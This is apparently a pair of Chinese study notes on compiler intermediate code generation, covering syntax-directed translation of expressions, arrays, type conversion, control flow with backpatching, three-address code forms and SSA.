💾

中间代码生成 II

2025年1月7日 17:12

生成表达式代码的 SDD

$$ \begin{array}{|ll|} \hline \text{产生式} & \text{语义规则} \ \hline S \to \text{id} = E ; & S.\text{code} = E.\text{code} \parallel \ & \quad \text{gen}(\text{top.get(id.lexeme)} = E.\text{addr}) \ \hline E \to E_1 + E_2 & E.\text{addr} = \text{new Temp()} \ & E.\text{code} = E_1.\text{code} \parallel E_2.\text{code} \parallel \ & \quad \text{gen}(E.\text{addr} = E_1.\text{addr} + E_2.\text{addr}) \ \hline \phantom{E \to \ }| - E_1 & E.\text{addr} = \text{new Temp()} \ & E.\text{code} = E_1.\text{code} \parallel \ & \quad \text{gen}(E.\text{addr} = \text{“minus”} E_1.\text{addr}) \ \hline \phantom{E \to \ }| ( E_1 ) & E.\text{addr} = E_1.\text{addr} \ & E.\text{code} = E_1.\text{code} \ \hline \phantom{E \to \ }| \text{id} & E.\text{addr} = \text{top.get(id.lexeme)} \ & E.\text{code} = \text{“”} \ \hline \end{array} $$

其中:

  • 综合属性 $\text{code}$ 表示代码
  • $\text{addr}$ 表示存放表达式结果的地址(临时变量)
  • $\text{top.get}(\cdots)$ 从栈顶符号表(符号是嵌套的,可以实现为栈)开始,逐个向下寻找 $\text{id}$ 的信息
  • $\text{new} , \text{Temp}()$ 可以生成一个临时变量
  • $\text{gen}(\cdots)$ 生成相应代码

这里实际上是一个增量式翻译,即要运算得到 c = a + b,先翻译出生成 ab 的代码,再翻译生成 c 的代码。

数组元素

数组元素的寻址

一维数组的寻址

假设数组元素被存放在连续的存储空间中,元素从 0 到 $n-1$ 编号,第 $i$ 个元素的地址为:

$$ \text{base} + i \cdot w $$

其中:

  • $\text{base}$ 为数据 $A$ 的内存块的起始地址,即 $A[0]$ 的相对地址
  • $w$ 为每个数组元素的宽度
  • $\text{base}$, $w$, $n$ 的值都可以从符号表中找到

k 维数组的寻址

假设数组按行存放,即首先存放 $A[0][i_2]...[i_k]$,然后存放 $A[1][i_2]...[i_k]$, ...

设 $n_j$ 为第 $j$ 维的维数,$w_j$ 为第 $j$ 维的每个子数组元素的宽度,$w_k = w$ 为单个元素的宽度:

$$ \begin{aligned} w_{k-1} &= n_k \cdot w_k = n_k \cdot w \ w_{k-2} &= n_{k-1} \cdot w_{k-1} = n_{k-1} \cdot n_k \cdot w \end{aligned} $$

多维数组 $A[i_1][i_2]...[i_k]$ 的地址为:

$$ \text{base} + i_1 \cdot w_1 + i_2 \cdot w_2 + ... + i_k \cdot w_k $$

或者:

$$ \text{base} + (((...((i_1 \cdot n_2 + i_2) \cdot n_3 + i_3)...) \cdot n_k) + i_k) \cdot w $$

多维数组的存放方法

  • 行优先(一般选择)
  • 列优先

求 $a[i]$ 的地址:

$$ \text{base} + (i - \text{low}) \cdot w = \text{base} - \text{low} \cdot w + i \cdot w $$

注意,这里 $\text{low}$ 是下界,其不一定为 0。

包含数组元素的表达式文法

添加新的文法产生式

  1. 数组元素 $L: L \rightarrow L[E] \ | \ id[E]$
  2. 以数组元素为左部的赋值 $S \rightarrow L = E$
  3. 数组元素作为表达式中的因子 $E \rightarrow L$

翻译方案

  1. 计算偏移量:对 $L$ 的代码计算偏移量,将结果存于 $L.\text{addr}$ 所指的临时变量中。

  2. 综合属性 $\text{array}$:记录相应数组的信息:元素类型,基地址等。

  3. 数组元素作为因子

    • $L$ 的代码只计算了偏移量

    • 数组元素的存放地址应该根据偏移量进一步计算,即 $L$ 的数组基地址加上偏移量

    • 使用三地址指令 $x = a[i]$

  4. 数组元素作为赋值左部

    • 使用三地址指令 $a[i] = x$。

$$ \begin{array}{|ll|} \hline \text{产生式} & \text{语义规则} \ \hline L \to \text{id} [ E ] & L.\text{array} = \text{top.get(id.lexeme)} \ & L.\text{type} = L.\text{array.type.elem} \ & L.\text{addr} = \text{new Temp()} \ & \text{gen}(L.\text{addr} = E.\text{addr} * L.\text{type.width}) \ \hline \phantom{L \to \ }| L_1 [ E ] & L.\text{array} = L_1.\text{array} \ & L.\text{type} = L_1.\text{type.elem} \ & t = \text{new Temp()} \ & L.\text{addr} = \text{new Temp()} \ & \text{gen}(t = E.\text{addr} * L.\text{type.width}) \ & \text{gen}(L.\text{addr} = L_1.\text{addr} + t) \ \hline E \to E_1 + E_2 & E.\text{addr} = \text{new Temp()} \ & \text{gen}(E.\text{addr} = E_1.\text{addr} + E_2.\text{addr}) \ \hline \phantom{E \to \ }| \text{id} & E.\text{addr} = \text{top.get(id.lexeme)} \ \hline \phantom{E \to \ }| L & E.\text{addr} = \text{new Temp()} \ & \text{gen}(E.\text{addr} = L.\text{array.base} [ L.\text{addr} ]) \ \hline S \to \text{id} = E ; & \text{gen}(\text{top.get(id.lexeme)} = E.\text{addr}) \ \hline \phantom{S \to \ }| L = E ; & \text{gen}(L.\text{array.base} [ L.\text{addr} ] = E.\text{addr}) \ \hline \end{array} $$

注意:

  • 这里不是在算数组的类型大小,而是在算一个数组表达式的相对于基地址的偏移量。
  • $\text{addr}$ 是偏移量这一计算结果的存放地址,而不是数组的基地址,基地址应当在 $\text{array}$ 属性里面。
  • 建议结合例子观察一下 $\text{type}$ 的解码顺序
  • 这里省略了一些 $\text{gen}$ 的引号,请勿认为它完成了计算,这只是生成了计算的代码。

例子

56189

类型检查和转换

类型系统 (type system)

  • 给每一个组成部分赋予一个类型表达式
  • 通过一组逻辑规则来表示这些类型表达式必须满足的条件

设计类型系统的根本目的是用静态检查的方式来保证合法程序运行时的良行为。

类型检查规则

类型综合:根据子表达式的类型构造出表达式的类型

例如:

  • 如果 $f$ 的类型为 $s \rightarrow t$ 且 $x$ 的类型为 $s$
  • 那么 $f(x)$ 的类型为 $t$

类型推导:根据语言结构的使用方式来确定该结构的类型

例如:

  • 如果 $f(x)$ 是一个表达式,$f$ 的类型为 $\alpha \rightarrow \beta$,且 $x$ 的类型为 $\alpha$
  • 那么 $f(x)$ 的类型为 $\beta$
  • $\alpha, \beta$ 可以是未知类型

类型转换

假设在表达式 $x * i$ 中,$x$ 为浮点数、$i$ 为整数,则结果应该是浮点数

  • $x$ 和 $i$ 使用不同的二进制表示方式
  • 浮点数 * 和整数 * 使用不同的指令
  • 例如:
    • $t_1 = (\text{float}) i$
    • $t_2 = x ; \text{fmul} ; t_1$

处理简单的类型转换的 SDD:

$$ \begin{array}{|ll|} \hline \text{产生式} & \text{语义规则} \ \hline E \to E_1 + E_2 & \text{if } (E_1.\text{type} = \text{integer} \text{ and } E_2.\text{type} = \text{integer}) E.\text{type} = \text{integer} \ & \text{else if } (E_1.\text{type} = \text{float} \text{ and } E_2.\text{type} = \text{integer}) E.\text{type} = \text{float} \ \hline \end{array} $$

类型拓宽和类型收缩

  • 编译器自动完成的转换为 隐式转换(coercion)
  • 程序员用代码指定的强制转换为 显式转换(cast)

处理类型转换的 SDT

$$ \begin{array}{|ll|} \hline \text{产生式} & \text{语义规则} \ \hline E \to E_1 + E_2 & E.\text{type} = \max(E_1.\text{type}, E_2.\text{type}); \ & a_1 = \text{widen}(E_1.\text{addr}, E_1.\text{type}, E.\text{type}); \ & a_2 = \text{widen}(E_2.\text{addr}, E_2.\text{type}, E.\text{type}); \ & E.\text{addr} = \text{new Temp}(); \ & \text{gen}(E.\text{addr} \text{ “=” } a_1 \text{ “+” } a_2); \ \hline \end{array} $$

widen 函数用于将一个地址的值转换为指定的类型。其定义如下:

Addr widen(Addr a, Type t, Type w) {
    if (t == w) return a;
    else if (t == integer && w == float) {
        Addr temp = new Temp();
        gen(temp '=' '(float)' a); // 就是这里发生了隐式类型转换
        return temp;
    }
    else error;
}
  • max 函数用于查找两个类型的最小公共祖先。具体实现依赖于类型系统的定义。
  • widen 函数生成必要的类型转换代码,并返回转换后的地址。

函数/运算符的重载

通过查看参数来解决函数重载问题:

$$ \begin{array}{|ll|} \hline \text{产生式} & \text{语义规则} \ \hline E \to f(E_1) & \text{if } f.\text{typeset} = {s_i \to t_i \mid 1 \leq i \leq k} \text{ and } E_1.\text{type} = s_k \text{ then } E.\text{type} = t_k \ \hline \end{array} $$

控制流的翻译

布尔表达式可以用于改变控制流/计算逻辑值:

文法:

$$ B \to B , || , B \mid B , && , B \mid !B \mid (B) \mid E , \text{rel} , E \mid \text{true} \mid \text{false} $$

短路求值:

  • $B_1 , || , B_2$ 中 $B_1$ 为真时,不用计算 $B_2$,整个表达式为真。
  • $B_1 , && , B_2$ 中 $B_1$ 为假时,不用计算 $B_2$,整个表达式为假。

短路代码通过跳转指令实现控制流的处理,逻辑运算符本身不在代码中出现。

98647

控制流语句的 SDD

$$ \begin{array}{|ll|} \hline \text{产生式} & \text{语义规则} \ \hline P \to S & S.\text{next} = \text{newlabel()} \ & P.\text{code} = S.\text{code} \parallel \text{label}(S.\text{next}) \ \hline S \to \text{assign} & S.\text{code} = \text{assign.code} \ \hline S \to \text{if} (B) S_1 & B.\text{true} = \text{newlabel()} \ & B.\text{false} = S_1.\text{next} = S.\text{next} \ & S.\text{code} = B.\text{code} \parallel \text{label}(B.\text{true}) \parallel S_1.\text{code} \ \hline S \to \text{if} (B) S_1 \text{ else } S_2 & B.\text{true} = \text{newlabel()} \ & B.\text{false} = \text{newlabel()} \ & S_1.\text{next} = S_2.\text{next} = S.\text{next} \ & S.\text{code} = B.\text{code} \parallel \text{label}(B.\text{true}) \parallel S_1.\text{code} \ & \quad \parallel \text{gen}(\text{“goto”} S.\text{next}) \parallel \text{label}(B.\text{false}) \parallel S_2.\text{code} \ \hline S \to \text{while} (B) S_1 & \text{begin} = \text{newlabel()} \ & B.\text{true} = \text{newlabel()} \ & B.\text{false} = S.\text{next} \ & S_1.\text{next} = \text{begin} \ & S.\text{code} = \text{label}(\text{begin}) \parallel B.\text{code} \parallel \text{label}(B.\text{true}) \parallel S_1.\text{code} \parallel \text{gen}(\text{“goto”} \text{begin}) \ \hline S \to S_1 S_2 & S_1.\text{next} = \text{newlabel()} \ & S_2.\text{next} = S.\text{next} \ & S.\text{code} = S_1.\text{code} \parallel \text{label}(S_1.\text{next}) \parallel S_2.\text{code} \ \hline \end{array} $$

重点在于理解标号的顺序,明白基本块之间是怎么跳转的,其实如果自己做完 Lab Lv6 基本上就很简单了。

布尔表达式控制流翻译

生成的代码执行时跳转到两个标号之一:

  • 表达式的值为真时,跳转到 $B.\text{true}$。
  • 表达式的值为假时,跳转到 $B.\text{false}$。

$B.\text{true}$ 和 $B.\text{false}$ 是两个继承属性,根据 $B$ 所在的上下文指向不同的位置:

  • 如果 $B$ 是 if 语句的条件表达式,分别指向 then 分支和 else 分支
  • 如果没有 else 分支,则 $B.\text{false}$ 指向 if 语句的下一条指令
  • 如果 $B$ 是 while 语句的条件表达式,分别指向循环体的开头和循环的出口

下图的代码中同时考虑了短路求值

$$ \begin{array}{|ll|} \hline \text{产生式} & \text{语义规则} \ \hline B \to B_1 || B_2 & B_1.\text{true} = B.\text{true}; B_1.\text{false} = \text{newlabel()}; \ & B_2.\text{true} = B.\text{true}; B_2.\text{false} = B.\text{false}; \ & B.\text{code} = B_1.\text{code} \parallel \text{label}(B_1.\text{false}) \parallel B_2.\text{code} \ \hline B \to B_1 && B_2 & B_1.\text{true} = \text{newlabel()}; B_1.\text{false} = B.\text{false}; \ & B_2.\text{true} = B.\text{true}; B_2.\text{false} = B.\text{false}; \ & B.\text{code} = B_1.\text{code} \parallel \text{label}(B_1.\text{true}) \parallel B_2.\text{code} \ \hline B \to ! B_1 & B_1.\text{true} = B.\text{false}; B_1.\text{false} = B.\text{true}; B.\text{code} = B_1.\text{code} \ \hline B \to (B_1) & B_1.\text{true} = B.\text{true}; B_1.\text{false} = B.\text{false}; B.\text{code} = B_1.\text{code} \ \hline B \to E_1 \text{ rel } E_2 & B.\text{code} = \text{gen}(\text{“if”} E_1.\text{addr } \text{rel.op } E_2.\text{addr } \text{“goto”} B.\text{true}) \parallel \text{gen}(\text{“goto”} B.\text{false}) \ \hline B \to \text{true} & B.\text{code} = \text{gen}(\text{“goto”} B.\text{true}) \ \hline B \to \text{false} & B.\text{code} = \text{gen}(\text{“goto”} B.\text{false}) \ \hline \end{array} $$

布尔值和跳转代码

程序中出现布尔表达式的目的也有可能就是求出它的值,例如 $x = a < b$

处理方法:首先建立表达式的语法树,然后根据表达式的不同角色来处理。

文法:

  • $S \rightarrow \text{id} = E; \ | \ \text{if (E) S} \ | \ \text{while (E) S} \ | \ S \ S$
  • $E \rightarrow E | E \ | \ E \ && \ E \ | \ E \ \text{rel} \ E \ | \ \ldots$

根据 $E$ 的语法树结点所在的位置:

  • $S \rightarrow \text{while (E) S1}$ 中的 $E$,生成跳转代码
  • $S \rightarrow \text{id} = E$,生成计算右值的代码

在写 Lab 的时候实际上是反正值肯定返回,但是怎么用(赋值还是条件跳转)就是上一级考虑的问题了。

回填

为布尔表达式和控制流语句生成目标代码的关键问题:某些跳转指令应该跳转到哪里?

例如: $\text{if (B) S}$

  • 按照短路代码的翻译方法,$B$ 的代码中有一些跳转指令在 $B$ 为假时执行,
  • 这些跳转指令的目标应该跳过 $S$ 对应的代码。生成这些指令时,$S$ 的代码尚未生成,因此目标不确定
  • 如果通过语句的继承属性 $\text{next}$ 来传递,当中间代码不允许符号标号时,则需要第二趟处理。

回填的基本思想

  1. 记录 $B$ 的代码中跳转指令 $\text{goto S.next}$,$\text{if ... goto S.next}$ 的位置,但是不生成跳转目标
  2. 这些位置被记录到 $B$ 的综合属性 $B.\text{falseList}$ 中
  3. 当 $S.\text{next}$ 的值已知时(即 $S$ 的代码生成完毕时),把 $B.\text{falseList}$ 中的所有指令的目标都填上这个值

回填技术

  • 生成跳转指令时暂时不指定跳转目标标号,而是使用列表记录这些不完整的指令
  • 等知道正确的目标时再填写目标标号
  • 每个列表中的指令都指向同一个目标,列表包括:$\text{truelist}$, $\text{falselist}$, $\text{nextlist}$

布尔表达式的回填翻译

$$ \begin{array}{|ll|} \hline \text{产生式} & \text{语义规则} \ \hline B \to B_1 || M B_2 & \text{backpatch}(B_1.\text{falselist}, M.\text{instr}); \ & B.\text{truelist} = \text{merge}(B_1.\text{truelist}, B_2.\text{truelist}); \ & B.\text{falselist} = B_2.\text{falselist}; \ \hline B \to B_1 && M B_2 & \text{backpatch}(B_1.\text{truelist}, M.\text{instr}); \ & B.\text{truelist} = B_2.\text{truelist}; \ & B.\text{falselist} = \text{merge}(B_1.\text{falselist}, B_2.\text{falselist}); \ \hline B \to ! B_1 & B.\text{truelist} = B_1.\text{falselist}; \ & B.\text{falselist} = B_1.\text{truelist}; \ \hline B \to (B_1) & B.\text{truelist} = B_1.\text{truelist}; \ & B.\text{falselist} = B_1.\text{falselist}; \ \hline B \to E_1 \text{ rel } E_2 & B.\text{truelist} = \text{makelist(nextinstr)}; \ & B.\text{falselist} = \text{makelist(nextinstr + 1)}; \ & \text{emit}(\text{“if”} E_1.\text{addr } \text{rel.op } E_2.\text{addr } \text{“goto” } B.\text{true}); \ & \text{emit}(\text{“goto”} B.\text{false}); \ \hline M \to \varepsilon & M.\text{instr} = \text{nextinstr}; \ \hline B \to \text{true} & B.\text{truelist} = \text{makelist(nextinstr)}; \ & \text{emit}(\text{“goto”} B.\text{true}); \ & B.\text{falselist} = \text{null}; \ \hline B \to \text{false} & B.\text{falselist} = \text{makelist(nextinstr)}; \ & \text{emit}(\text{“goto”} B.\text{false}); \ & B.\text{truelist} = \text{null}; \ \hline \end{array} $$

首先注意:所有的语义规则都是在产生式末尾,这个表省略了大括号(后同),此时,你即将规约回产生式头,而且拥有了所有产生式体的属性(此时他们是综合属性),所以可以随便用了。

这里,引入两个综合属性:

  • truelist:包含跳转指令(位置)的列表,这些指令在取值 true 时执行
  • falselist:包含跳转指令(位置)的列表,这些指令在取值 false 时执行

辅助函数包括:

  • makelist(i):构造一个列表
  • merge(p1, p2):合并两个列表
  • backpatch(p, i):用 i 回填 p 指向的语句列表中的跳转语句的跳转地址

大概讲一下,以第一个产生式 $B \to B_1 || M B_2$ 为例:

  1. 当展开此步的时候,我们已经知道了当 $B_1$ 为假时,会继续判断 $B_2$,所以可以用 $M.\text{instr}$ 回填 $B_1.\text{falselist}$
  2. 但是此时还没有生成 $B_2$ 的代码,我们不知道 $B_1$ 为真的时候应该跳多远才能跳过 $B_2$,所以先把 $B_1.\text{truelist}$ 和 $B_2.\text{truelist}$ 合并,得到 $B.\text{truelist}$,这意味着如果二者任一为真,就代表 $B$ 为真,在回填 $B.\text{truelist}$ 的时候,也就可以回填到 $B_1.\text{truelist}$ 和 $B_2.\text{truelist}$
  3. 当然,如果 $B_2$ 为假(这隐含我们已经判断到了 $B_2$,也即 $B_1$ 为假),那么 $B$ 也为假,所以 $B.\text{falselist}$ 就是 $B_2.\text{falselist}$

控制流语句的回填翻译

$$ \begin{array}{|ll|} \hline \text{产生式} & \text{语义规则} \ \hline S \to \text{if} (B) \ M_1 \ S_1 \ N \ \text{else} \ M_2 \ S_2 & \text{backpatch}(B.\text{truelist}, M_1.\text{instr}); \ & \text{backpatch}(B.\text{falselist}, M_2.\text{instr}); \ & \text{temp} = \text{merge}(S_1.\text{nextlist}, N.\text{nextlist}); \ & S.\text{nextlist} = \text{merge}(\text{temp}, S_2.\text{nextlist}); \ \hline S \to \text{if} (B) \ \text{then} \ M \ S_1 & \text{backpatch}(B.\text{truelist}, M.\text{instr}); \ & S.\text{nextlist} = \text{merge}(B.\text{falselist}, S_1.\text{nextlist}); \ \hline N \to \varepsilon & N.\text{nextlist} = \text{nextinstr}; \ & \text{emit}(\text{“goto”____}); /* 稍后回填 */ \ \hline M \to \varepsilon & M.\text{instr} = \text{nextinstr}; \ \hline S \to \text{while} \ M_1 \ (B) \ \text{do} \ M_2 \ S_1 & \text{backpatch}(S_1.\text{nextlist}, M_1.\text{instr}); \ & \text{backpatch}(B.\text{truelist}, M_2.\text{instr}); \ & S.\text{nextlist} = B.\text{falselist}; \ & \text{emit}(\text{“goto”} M_1.\text{instr}); \ \hline S \to { L } & S.\text{nextlist} = L.\text{nextlist}; \ \hline S \to A & S.\text{nextlist} = \text{null}; \ \hline L \to L_1 \ M \ S & \text{backpatch}(L_1.\text{nextlist}, M.\text{instr}); \ & L.\text{nextlist} = S.\text{nextlist}; \ \hline L \to S & L.\text{nextlist} = S.\text{nextlist}; \ \hline \end{array} $$

和之前大差不差。

Break 和 Continue 语句的处理方法

Break 语句:

  • 追踪外围语句 $S$
  • 生成一个跳转指令坯
  • 将这个指令坯的位置加入到 $S.\text{nextlist}$ 中

跟踪的方法:

  • 在符号表中设置 $\text{break}$ 条目,令其指向外围语句
  • 在符号表中设置指向 $S.\text{nextlist}$ 的指针,然后把这个指令坯的位置直接加入到 $\text{nextlist}$ 中

Switch 语句的生成式

为了构造 switch 语句的翻译方案,设置一个队列变量 $q$

$q$ 的元素是记录,包含 $c$(condition) 和 $d$(destination) 两个成员,分别用于存储 case 后面的常量值 $v$ 和各语句串中间代码第一个三地址语句地址,以便生成 test 后面的条件转移语句时使用

Switch 语句的翻译方案

$$ \begin{array}{|ll|} \hline \text{产生式} & \text{语义规则} \ \hline S \rightarrow \text{switch} (E) H { M , \text{default}:F , L } & S.\text{nextlist} = \text{merge}(M.\text{nextlist}, L.\text{nextlist}, \text{makelist}(\text{nextinstr})) \ & \text{emit}(\text{goto-'}) \\ & \text{backpatch}(H.\text{list}, \text{nextinstr}) \\ & \text{for t in } q: \\ & \quad \text{gen}(\text{if'} , E.\text{addr } \text{==' } t.c \, \text{goto' } t.d) \ & \text{emit}(\text{goto' } F.\text{instr}) \\ \hline H \rightarrow \varepsilon & \text{set q as } \varnothing \\ & H.\text{list} = \text{makelist}(\text{nextinstr}) \\ & \text{emit}(\text{goto-'}) \ \hline F \rightarrow \varepsilon & F.\text{instr} = \text{nextinstr} \ \hline M \rightarrow \text{case} , C:F , L & t.c = C.\text{val} \ & t.d = F.\text{instr} \ & \text{insert } t , \text{into } q \ & M.\text{nextlist} = \text{merge}(L.\text{nextlist}, \text{makelist}(\text{nextinstr})) \ & \text{emit}(\text{goto-'}) \\ \hline M \rightarrow M_1 \, \text{case} \, C:F \, L & t.c = C.\text{val} \\ & t.d = F.\text{instr} \\ & \text{insert } t \, \text{into } q \\ & M.\text{nextlist} = \text{merge}(M_1.\text{nextlist}, L.\text{nextlist}, \text{makelist}(\text{nextinstr})) \\ & \text{emit}(\text{goto-'}) \ \hline L \rightarrow S & L.\text{nextlist} = S.\text{nextlist} \ \hline L \rightarrow L_1 , F , S & \text{backpatch}(L_1.\text{nextlist}, F.\text{instr}) \ & L.\text{nextlist} = S.\text{nextlist} \ \hline \end{array} $$

For 循环的翻译方案

(来自 22 年往年题)

$$ \begin{array}{|ll|} \hline \text{产生式} & \text{语义规则} \ \hline S \to \text{for} \ (S_1 \ M_1 \ ; B ; \ M_2 \ S_2) \ N \ S_3 & \text{backpatch}(B.\text{truelist}, N.\text{instr}); \ & \text{backpatch}(N.\text{nextlist}, M_1.\text{instr}); \ & \text{backpatch}(S_1.\text{nextlist}, M_1.\text{instr}); \ & \text{backpatch}(S_2.\text{nextlist}, M_1.\text{instr}); \ & \text{backpatch}(S_3.\text{nextlist}, M_2.\text{instr}); \ & \text{emit}(\text{“goto”} \ M_2.\text{instr}); \ & S.\text{nextlist} = B.\text{falselist}; \ \hline M \to \varepsilon & M.\text{instr} = \text{nextinstr}; \ \hline N \to \varepsilon & N.\text{nextlist} = \text{makelist}(\text{nextinstr}); \ & \text{emit}(\text{“goto”} \ ____); \ & N.\text{instr} = \text{nextinstr}; \ \hline \end{array} $$ 注意这里,$B$ 默认是非顺序执行,一定跳转的,所以 $M_2$ 的位置不是 $N$,而 $S_2$ 默认接下来是顺序执行的,所以后面要跟个 $\text{goto}$。

💾

中间代码生成 I

2024年11月10日 22:11

中间代码

中间代码是介于源代码和目标代码之间的一种代码形式,它既不依赖于具体的编程语言,也不依赖于具体的目标机。

  • 对不同的程序语言进行编译时,可以采用同一种形式的中间代码。
  • 同一种形式的中间代码,可以转换成不同目标机的目标代码。
  • 在中间代码上可以进行各种不依赖于目标机的优化,这些优化程序可以在不同的程序语言和不同的目标机的编译程序中重复使用。

编译器前端的逻辑结构:

image-20241118103823890

中间代码的表示形式

  • 抽象语法树(AST)
  • DAG(Directed Acyclic Graph 有向无环图)
  • 后缀式(也称逆波兰表示)
  • 三地址代码

AST

AST 抽象语法树的生成方式同前文章所述。

image-20241118104004274

DAG

image-20241118104025778

和 AST 的区别:尽可能的复用相同的节点。

这点在翻译上亦有体现:在产生表达式 DAG 的翻译方案中,每次调用 Leaf()Node() 的构造函数时,要检查是否已存在相同结构的节点,如果存在,则返回找到的已有节点,否则构造新节点(但这在下表中不体现,所以看上去和 AST 没有区别)。

$$ \begin{array}{|l|l|} \hline \text{产生式} & \text{语义动作} \ \hline E \to E_1 + T &{ E.\text{node} = \text{new Node (“+”}, E₁.\text{node}, T.\text{node}); } \ E \to T &{ E.\text{node} = T.\text{node}; } \ T \to T_1 * F &{ T.\text{node} = \text{new Node (“*”}, T₁.\text{node}, F.\text{node}); } \ T \to F &{ T.\text{node} = F.\text{node}; } \ F \to (E) &{ F.\text{node} = E.\text{node}; } \ F \to id &{ F.\text{node} = \text{new Leaf(ID, id.name); } } \ F \to num &{ F.\text{node} = \text{new Leaf(NUM, num.val); } } \ \hline \end{array} $$

由于这个检查的存在,DAG 生成效率降低了,但是运行效率提高了。

三地址代码

基本形式:

$$ x = y \text{ op } z $$

类别:

  1. 一元运算:$ x = \text{op } y $,$\text{op}$ 是一元运算符,如一元减、逻辑非等。

  2. 复制指令:$ x = y $

  3. 无条件跳转:$ \text{goto } L $

  4. 条件跳转:$ \text{if } x \text{ goto } L $ ($x$ 为真时跳转)或 $ \text{if } \text{False } x \text{ goto } L $ ($x$ 为假时跳转)

  5. 条件转移:$ \text{if } x \text{ ROP } y \text{ goto } L $,仅当 $x \text{ ROP } y$ 成立时跳转

    $\text{ROP}$ 是关系运算符,包括 $<$、$\leq$、$>$、$\geq$、$==$、$!=$ 等

  6. 参数传递与函数调用:

    1. 首先使用 $ \text{param } x_1$、 $\text{param } x_2$ $\cdots$ $\text{param } x_n $ 传递参数
    2. 然后使用 $ \text{call } p, n $ 调用函数,其中 $p$ 是函数名,$n$ 是参数个数
  7. 数组与地址操作

    1. 把数组元素 $y[z]$ 的值赋给 $x$:$x = y[z]$
    2. 把 $z$ 的值赋给数组元素 $x[y]$:$x[y] = z$
    3. 把 $y$ 的地址赋给 $x$:$x = &y$
    4. 把 $y$ 值为地址的存储空间的值赋给 $x$:$x = *y$
    5. 把 $y$ 值赋给 $x$ 值为地址的存储空间:$*x = y$

示例 1

语句

do i = i + 1; while (a[i] < v);

符号标号

L:  t1 = i + 1
    i = t1
    t2 = i * 8
    t3 = a[t2]
    if t3 < v goto L

位置号

100: t1 = i + 1
101: i = t1
102: t2 = i * 8
103: t3 = a[t2]
104: if t3 < v goto 100

三地址代码具体实现

对于表达式

$$ a = b * -c + b * -c $$

其三地址代码可以表示为如下几种方式。

四元式表示

$$ \begin{array}{|c|c|c|c|c|} \hline \text{inst} & \text{op} & \text{arg1} & \text{arg2} & \text{result} \ \hline (0) & \text{uminus} & c & & t_1 \ (1) & * & b & t_1 & t_2 \ (2) & \text{uminus} & c & & t_3 \ (3) & * & b & t_3 & t_4 \ (4) & + & t_2 & t_4 & t_5 \ (5) & \text{assign} & t_5 & & a \ \hline \end{array} $$

三元式表示

$$ \begin{array}{|c|c|c|c|} \hline \text{inst} & \text{op} & \text{arg1} & \text{arg2} \ \hline \text{(0)} & \text{uminus} & c & \ \text{(1)} & * & b & (0) \ \text{(2)} & \text{uminus} & c & \ \text{(3)} & * & b & (2) \ \text{(4)} & + & (1) & (3) \ \text{(5)} & \text{assign} & a & (4) \ \hline \end{array} $$

注:三元式中可以使用指向三元式语句的指针来表示操作数。

间接三元式表示

$$ \begin{array}{|c|c|} \hline \text{address} & \text{inst} \ \hline \text{0} & \text{(0)} \ \text{1} & \text{(1)} \ \text{2} & \text{(2)} \ \text{3} & \text{(3)} \ \text{4} & \text{(4)} \ \text{5} & \text{(5)} \ \hline \end{array} $$

$$ \begin{array}{|c|c|c|c|} \hline \text{inst} & \text{op} & \text{arg1} & \text{arg2} \ \hline \text{(0)} & \text{uminus} & c & \ \text{(1)} & * & b & (0) \ \text{(2)} & \text{uminus} & c & \ \text{(3)} & * & b & (2) \ \text{(4)} & + & (1) & (3) \ \text{(5)} & \text{assign} & a & (4) \ \hline \end{array} $$

间接三元式:三元式表 + 间接码表。

间接码表是一张指示表,按运算的先后次序列出相关三元式们在三元式表中的位置。

这样,修改语句顺序的时候,只需要修改间接码表,而不需要修改三元式表,方便优化。

不同表示方法的对比

  • 四元式需要利用较多的临时单元,四元式之间的联系通过临时变量实现
  • 中间代码优化处理时,四元式比三元式更为方便
  • 间接三元式与四元式同样方便,两种实现方式需要的存储空间大体相同

静态单赋值(SSA)

SSA(Static Single Assignment):每个变量在 SSA 形式中只赋值一次,每次赋值都对应一个不同的变量名。

示例

转换前:

p = a + b
q = p - c
p = q * d
p = e - p
q = p + q

转换后:

p1 = a + b
q1 = p1 - c
p2 = q1 * d
p3 = e - p2
q2 = p3 + q1

Phi 函数

作用:在不同路径中对同一个变量赋值时,使用 $\phi$ 函数来合并不同的赋值。

示例:

if (flag) x = -1;
else x = 1;
y = x * a;

转换前:

$$ \begin{array}{l} \text{if(flag)} \ \quad x = -1; \ \text{else} \ \quad x = 1; \ y = x * a; \ \end{array} $$

转换后:

$$ \begin{array}{l} \text{if (flag)} \ \quad x1 = -1; \ \text{else} \ \quad x2 = 1; \ x3 = \phi(x1, x2); \ y = x3 * a; \ \end{array} $$

类似于 ICS 中学到的条件转移 cmov 指令。

类型和声明

类型检查(Type Checking):利用一组规则来检查运算分量的类型和运算符的预期类型是否匹配。

语言类型

  • 类型化的语言:变量都被给定类型的语言。

    特点:表达式、语句等语法构造的类型都是可以静态确定的。

    例如,类型为 boolean 的变量 x 在程序每次运行时的值只能是布尔值,not(x) 总有意义。

  • 非类型化的语言:不限制变量值范围的语言。

    特点:一个运算可以作用到任意的运算对象,其结果可能是一个有意义的值,一个错误,一个异常或一个语言未加定义的结果。

类型表达式

类型表达式 (Type Expression):用来表示源程序中变量、常量、表达式、语句等语言成分的类型。

种类:

  • 基本类型:$\text{boolean}$, $\text{char}$, $\text{integer}$, $\text{float}$ 等
  • 类名
  • 数组类型:$\text{array}$
  • 记录(结构)类型:$\text{record}$
  • 函数类型:$\text{s} \rightarrow \text{t}$ 从 $\text{s}$ 到 $\text{t}$ 的函数表示为 $\text{s} \rightarrow \text{t}$
  • 笛卡尔积:用 $\times$ 表示列表或元组(例如函数参数)
  • 指针类型
  • 类型表达式的变量

类型表达式的例子

C 语言的类型:

struct {
    int no;
    char name[20];
}

类型表达式为:

$$ \text{record} \left( (\text{no} \times \text{integer}) \times (\text{name} \times \text{array} (20, \text{char})) \right) $$

类型等价 (Type Equivalence)

类型等价:两个类型的值集合相等并且作用于其上的运算集合相等。

特点:具有对称性

种类:

  • 按名字等价:两个类型名字相同,或者被定义成等价的两个名字
  • 按结构等价:两个类型的结构完全相同,但是名字不一定相同

按名字等价一定是按结构等价的。

类型兼容 (Type Compatibility)

类型兼容:两个类型可以替换而不会引起类型错误。

注意,其是针对某种运算而言,而且类型相容 不具有对称性

比如,在有的语言中,整型类型对实型值运算与实型类型相容。

即允许把整型的值赋给实型变量,但不允许把实型的值赋给整型变量。

声明语句

文法:

$$ \begin{array}{l} D \rightarrow T \ id \ ; \ D \ | \ \varepsilon \ T \rightarrow B \ C \ | \ \text{record} \ \text{“{”} \ D \ \text{“}”} \ B \rightarrow \text{int} \ | \ \text{float} \ C \rightarrow \varepsilon \ | \ [num] \ C \ \end{array} $$

含义:

